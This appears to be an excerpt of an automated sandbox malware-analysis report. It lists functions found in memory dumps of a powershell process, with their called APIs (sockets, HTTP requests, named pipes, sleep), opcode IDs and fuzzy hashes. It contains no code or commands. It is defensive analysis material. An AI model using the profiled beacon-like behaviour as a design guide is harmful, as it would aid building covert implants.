                                                    Function 0000022EFA0BA280 Relevance: .4, Instructions: 404COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free
                                                    • String ID:
                                                    • API String ID: 1294909896-0
                                                    • Opcode ID: 39230a270b39aa7a03f1acc75e1d4406c9dcc848d7b32e178703d764618bc014
                                                    • Instruction ID: d9aaaffca6bb1529661b946d2865b2b55e5786523a60238228c849d4abb7c07a
                                                    • Opcode Fuzzy Hash: 39230a270b39aa7a03f1acc75e1d4406c9dcc848d7b32e178703d764618bc014
                                                    • Instruction Fuzzy Hash: B0F1BA6231464267EF20CB95F7A839E63A1F79C7C4F920121EA49CBFA5EA3CC905D740
                                                    Function 0000022EF9B1CE3C Relevance: .4, Instructions: 374COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                                                    • Instruction ID: 9b7fb0ce0df590d690e4e9a84df3ce06483fedb78fba2462d04161a28a2f1702
                                                    • Opcode Fuzzy Hash: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                                                    • Instruction Fuzzy Hash: 00E1D16271070093FF74CBA5EA693AA63A1F7A4754F068125DBCE87E86DB3CE085D344
                                                    Function 0000022EF9B1916C Relevance: .4, Instructions: 367COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free
                                                    • String ID:
                                                    • API String ID: 1294909896-0
                                                    • Opcode ID: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                                                    • Instruction ID: a9b308227936368885a5768574c2fa8c2da0a59b91ddd908b1fac46bf7483142
                                                    • Opcode Fuzzy Hash: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                                                    • Instruction Fuzzy Hash: 8FE1D632704A83A1EF309B95E5A43EE67A1F7A478CF920011DB8D87E99EB34C985D744
                                                    Function 0000022EFA0B9D6C Relevance: .4, Instructions: 367COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free
                                                    • String ID:
                                                    • API String ID: 1294909896-0
                                                    • Opcode ID: fb1a47b38430a28a9ce52fe961906e0d16b6bf2ab463da1186ab792c5180ee2f
                                                    • Instruction ID: 8331bcb1457d6410556cd74856e49cb29e26d58d317f5adbae47363ee1dca71b
                                                    • Opcode Fuzzy Hash: fb1a47b38430a28a9ce52fe961906e0d16b6bf2ab463da1186ab792c5180ee2f
                                                    • Instruction Fuzzy Hash: 05E1C762314A4262EF209B95F76439E67A1F79C7C8F820021DA49DBFB5EB3CC945D740
                                                    Function 0000022EF9B20334 Relevance: .2, Instructions: 163COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                                                    • Instruction ID: 73fd1cfd9b2da8678623a770c9c92a51e0463d551cfc85ba5d5723aa0bee59bf
                                                    • Opcode Fuzzy Hash: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                                                    • Instruction Fuzzy Hash: 7271C132614A40E6EF318FA5E66835E73E0F7A8B84F025129DAC947F94DF38C454AF48
                                                    Function 0000022EFA0DCF97 Relevance: .1, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                                    • Instruction ID: 57127f9501db14766b3551d79096ff62ed535da517596f2af0b40090deb5e2d9
                                                    • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                                    • Instruction Fuzzy Hash: 38613EB6214A509BDB54CB0DE4D462AB7E1F3CC784F84421AE38B8BB78CA3CD545DB40
                                                    Function 0000022EFA0E2020 Relevance: .0, Instructions: 37COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2449b57596a50ad70bf5a79ad03ba1278d28424a0d500497218b9da266a4c145
                                                    • Instruction ID: b445f5c232932eb450832e13d8518f1b5806b1264e696cb039e1d4e9af345165
                                                    • Opcode Fuzzy Hash: 2449b57596a50ad70bf5a79ad03ba1278d28424a0d500497218b9da266a4c145
                                                    • Instruction Fuzzy Hash: ADF01297E1DAD266FE6356949DAD3582F91A7AEA11F4F818A8B4047FE3B40D0801F212
                                                    Function 0000022EFA0E24E0 Relevance: .0, Instructions: 21COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 29815153074e48871c3a2db5cbc692924d6533ff20b66ed198598eb5028f0353
                                                    • Instruction ID: f0770e9e924f59feec01357c703aa86827f69510df92ff26a9f885cb6f7b8b8b
                                                    • Opcode Fuzzy Hash: 29815153074e48871c3a2db5cbc692924d6533ff20b66ed198598eb5028f0353
                                                    • Instruction Fuzzy Hash: 08E01CD7E0EEC15AFB6245A45EB921E2FD1A7AE900F4F408A87404BBE3A54E0C047311
                                                    Function 0000022EFA0E2068 Relevance: .0, Instructions: 18COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6a38d87a5f747cfd96f0f8b0dd282aa28bb16f1709dd6933a6d9f996ca703024
                                                    • Instruction ID: 57de98d6538fa8298c5ad49413b0c6c2f6e1d7b828e6ef344fc994d731bffcf2
                                                    • Opcode Fuzzy Hash: 6a38d87a5f747cfd96f0f8b0dd282aa28bb16f1709dd6933a6d9f996ca703024
                                                    • Instruction Fuzzy Hash: 59E04897D1D6D25AEE5756645DAE3882F90A3AF925F8B418BC64047FD3B10D0C05F311
                                                    Function 0000022EFA0E2630 Relevance: .0, Instructions: 13COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                                                    • Instruction ID: cdd49959d2808f7d377b8a8589fd15b5391220e7d694c6db10a901c9cf0d696d
                                                    • Opcode Fuzzy Hash: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                                                    • Instruction Fuzzy Hash: 81D012C7A1D6D215FEA392A49E6D3481F9063BA521F4E41CF86800EBF3A44D1801B211
                                                    Function 0000022EFA0C6BE0 Relevance: 22.7, APIs: 15, Instructions: 195networkCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: acceptioctlsocket$closesockethtonlselect
                                                    • String ID:
                                                    • API String ID: 2003300010-0
                                                    • Opcode ID: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                                                    • Instruction ID: 5ee0c2036f9400118f43ed8c7f4d6a3c5c8cea76e313fcbbe0cd53ee9065c98c
                                                    • Opcode Fuzzy Hash: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                                                    • Instruction Fuzzy Hash: FD918C32610A91AAEF31CFA1EA9879D33A1F78C794F011126EA4D4BFA5DF38C565D700
                                                    Function 0000022EFA0BEC04 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 165networksleepCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep
                                                    • String ID: %s%s$*/*
                                                    • API String ID: 3787158362-856325523
                                                    • Opcode ID: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                                                    • Instruction ID: 58e8359b469f14fb117c896152673baded2efca7ab9dc8fd7969fd12abd9dae3
                                                    • Opcode Fuzzy Hash: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                                                    • Instruction Fuzzy Hash: 3F817C66200B45A5EF109BA1FA987D973A0F39C788F420122DA4D5BFB9DF7CC509E750
                                                    Function 0000022EFA0C53E4 Relevance: 18.1, APIs: 12, Instructions: 105pipesleepfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
                                                    • String ID:
                                                    • API String ID: 34948862-0
                                                    • Opcode ID: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                                                    • Instruction ID: a02e4bae9faded3ac52bb2943b3c680d992426e2d493f9f66a9c5da8cc123118
                                                    • Opcode Fuzzy Hash: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                                                    • Instruction Fuzzy Hash: D1415B36644A05E6EF10DBA1FA9875D23A9E38CBA4F524224DA1A4BFB4DF3CC445A700
                                                    Function 0000022EFA0CFF6C Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                    • String ID:
                                                    • API String ID: 4099253644-0
                                                    • Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                                                    • Instruction ID: d326efd2cf76664ebcaa07d7465f40b7cc2dcc364891aca820e918ff13ec2602
                                                    • Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                                                    • Instruction Fuzzy Hash: 1C31F525201B40B1FE54AFD1FA5C3A527A0EB8CB94F0A06259A1A1EFF1EF7CC445B321
                                                    Function 0000022EFA0CFE10 Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1138158220-0
                                                    • Opcode ID: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                                                    • Instruction ID: 9d8c23c3cd5774b214a3a804d69176ef10ad4d97af70f3412c16c8766775c7aa
                                                    • Opcode Fuzzy Hash: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                                                    • Instruction Fuzzy Hash: 91319422300B45A2FF209FE9F65835D67E1AB8CB94F1645249A494BFF6DF3CC440A711
                                                    Function 0000022EFA0C7308 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 73networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                                                    • String ID: d
                                                    • API String ID: 1257931466-2564639436
                                                    • Opcode ID: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                                                    • Instruction ID: 5bacc53b5b19f75485decfdf2a2520c4cd3299e2c02fbec906fef8ae7153be54
                                                    • Opcode Fuzzy Hash: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                                                    • Instruction Fuzzy Hash: DB318F32214B85A6EF218FA1F98838A77A4F78CB84F011116EA8D4BF24DF78C555DB00
                                                    Function 0000022EF9B31B48 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 227COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: write_multi_char$write_string$free
                                                    • String ID:
                                                    • API String ID: 2630409672-3916222277
                                                    • Opcode ID: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                                                    • Instruction ID: 80dfc98412a3de38e3a32a7de1145f90028f2f7639cadfb9b9f1151653590b3f
                                                    • Opcode Fuzzy Hash: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                                                    • Instruction Fuzzy Hash: 3BA10722708654A5FF31CBE5D628BAE6BB4F7A5794F160005DEC917F98CB39C844EB08
                                                    Function 0000022EFA0C71FC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57networksleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountTick$ErrorLastSleepselectsend
                                                    • String ID: d
                                                    • API String ID: 2152284305-2564639436
                                                    • Opcode ID: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                                                    • Instruction ID: 807254945ce4b0d2ec3709d69434ca479834c813b665ce8bfeb0b1c5113c9b41
                                                    • Opcode Fuzzy Hash: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                                                    • Instruction Fuzzy Hash: 9A217C32214A81A6EF608FA1F98838A73A1F78C784F414225EB9D4BFA4DF3CC454DB44
                                                    Function 0000022EFA0BFB08 Relevance: 15.1, APIs: 10, Instructions: 91sleepfilepipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
                                                    • String ID:
                                                    • API String ID: 3101085627-0
                                                    • Opcode ID: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                                                    • Instruction ID: be9e8cf1099eb8ddcd55848b401be81a38e40baf2ede53ccbec6a0000453533b
                                                    • Opcode Fuzzy Hash: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                                                    • Instruction Fuzzy Hash: DF414A22700945AAEF109FF5E69879C2361F74CB88F420126AE099BFB9DE3CC549E750
                                                    Function 0000022EF9B3621C Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 388111225-0
                                                    • Opcode ID: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                                                    • Instruction ID: 8ec6e5e2199752143b1a924499f2a51acdf5b495b6144fb0d8d8f100bf95d3e4
                                                    • Opcode Fuzzy Hash: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                                                    • Instruction Fuzzy Hash: 62313931B00644E5FF31EFE69EBAB6D3650A7A1B90F474125EA9117FC3CA78C441A718
